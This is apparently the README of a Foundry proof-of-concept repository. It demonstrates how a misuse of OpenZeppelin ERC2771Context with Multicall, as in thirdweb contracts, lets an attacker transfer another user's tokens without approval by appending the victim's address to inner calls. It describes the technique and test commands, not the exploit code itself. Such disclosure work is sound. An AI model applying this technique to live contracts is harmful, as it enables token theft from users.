Foundry POC that shows how the thirdweb contracts are exploited due to the wrong use of Openzeppelin ERC2771 with Multicall
The repository contains three main contracts
- Forwarder.sol - Mimics the working of a relayer, the attacker calls the function on it and it forwards the call to the erc20 token.
- ThirdWebErc20.sol - It is a simplified contract that has the vulnerable multi-call functionality and inherits from open zeppelin ERC2771Context, and together both these make the token vulnerable.
Let's say two users cats and nirlin have been minted 100 tokens each.
Now cats decide to go crazy and rogue and decide to wear a blackhat, cats can craft a set of a malicious transfer transaction, where each inner transaction have nirlin address appened to it, these will pass all the system validation and will transfer the tokens of nirlin to cats without any approval.
You can read more about the details of how this works in the following breakdowns:
$ forge build$ forge test --match-test testMaliciousTransfer -vv